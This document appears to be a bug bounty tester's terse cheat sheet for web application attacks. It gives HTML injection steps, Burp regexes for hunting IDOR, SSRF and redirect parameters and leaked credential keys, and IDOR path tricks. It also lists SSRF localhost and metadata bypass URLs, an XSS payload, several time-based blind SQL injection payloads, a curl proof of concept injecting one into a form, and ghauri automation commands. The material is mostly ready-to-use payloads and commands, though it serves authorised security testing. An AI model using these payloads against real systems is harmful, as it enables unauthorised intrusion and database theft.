Manual Testing
⚡ Steps to Reproduce: HTML Injection
Create an account www.target.com
Then go to "Edit My Profile" page
In the "Name" field, paste this payload:
<h1>test</h1> <a href="https://google.com">google</a>
{{8*8}}4. Log out from the account.
5. Then got to the "Forgot Password" link and put in the email.
6. Check the inbox. You can see HTML rendering the message
{
"username": "asad",
"password": "swag@bugcrowdninja.com",
"email": "swag@bugcrowdninja.com"
}Find LFI & SSRF & Open Redirect Parameters :
Burp Regex
?.*=(//?\w+|\w+/|\w+(%3A|:)(/|%2F)|%2F|[.\w]+.\w{2,4}[^\w])Find IDOR Parameters:
Burp Regex
(?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)Find Sensitive Discover :
Burp Regex
(?i)(access_key|accessKeyId|accessKeySecret|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_key|cloudinary_api_secret|cloudinary_name|codecov_token|config|conn.login|connectionstring|consumer_key|consumer_secret|credentials|cypress_record_key|database_password|database_schema_test|datadog_api_key|datadog_app_key|db_password|db_server|db_username|dbpasswd|dbpassword|dbuser|deploy_password|digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd|docker_password|dockerhub_password|dockerhubpassword|dot-files|dotfiles|droplet_travis_password|dynamoaccesskeyid|dynamosecretaccesskey|elastica_host|elastica_port|elasticsearch_password|encryption_key|encryption_password|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey)['" ]+(=|:)(?i)([a-z0-9]+){0,}((_|-){0,}(\s){0,})(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)(\s){0,}(=|:|is|>){1,}(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_key|cloudinary_api_secret|cloudinary_name|codecov_token|config|conn.login|connectionstring|consumer_key|consumer_secret|credentials|cypress_record_key|database_password|database_schema_test|datadog_api_key|datadog_app_key|db_password|db_server|db_username|dbpasswd|dbpassword|dbuser|deploy_password|digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd|docker_password|dockerhub_password|dockerhubpassword|dot-files|dotfiles|droplet_travis_password|dynamoaccesskeyid|dynamosecretaccesskey|elastica_host|elastica_port|elasticsearch_password|encryption_key|encryption_password|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey)[a-z0-9_ .\-,]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z\-_=]{8,64})['\"]/register -> 403 /register?cb=titifelbro47 -> 200api/user/2124 to try ?user=userid
try /api/;/private/user/21316623
try /resource/123,124 or /123,122/ to return multiple records.
try /api/private/user/x-user-id:21316625, user=12345, id=12345, user_id=12345.
try /api/private/user/12345, /api/private/user/profile/12345, /profile/12345, etc.
try path tricks — inject ;, ;/, //, or ../ style separators (e.g. /api/;/private/user/12345) to confuse routers.
try OPTIONS, HEAD, POST, PUT, PATCH, DELETE (sometimes endpoints validate IDs only on GET).
Remove cookies — delete session cookie or replace
Try playing with sessionid= parameters, because some of the web app tieup userid with their respective session- http://[::]:8080/
- http://00000
- http://2130706433
- http://0x7f.1
- http://metadata'"/><img src=x onerror=frames['alert'](document["domain"])>1=1--+-
'XOR(603*if(now()=sysdate(),sleep(6),0))XOR'Z
‘XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR’Z
'XOR(94102*if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
'and 1=DBMS_PIPE.RECEIVE_MESSAGE(1,10)--
''||(select 1 from (select pg_sleep(6))x)||'
'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(20),0))OR'SQLI Proof of Concept (PoC):
confirmed it manually using curl:
curl -s -w "Total time: %{time_total}\n" \
'https://target.com/endpoint.php' \
-X POST -i --insecure \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: https://target.com/' \
-H 'Cookie: PHPSESSID=xxxxxx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "approval=true&inputCellPhone=555-666-0606&inputEmail=test@example.com&inputFirstName=John&inputLastName=Doe&inputSecurityAnswer=1&inputSecurityQuestion=1&subscription_list%5B%5D=6030'XOR(603*if(now()=sysdate(),sleep(6),0))XOR'Z"ghauri -r req.txt --random-agent --current-user --current-db
Dont Forget to Custom ijection Maker * in Requestghauri -u --level 3 --random-agent --batch --confirm --time-sec=10 --delay 5 --dbms=mysqlLast updated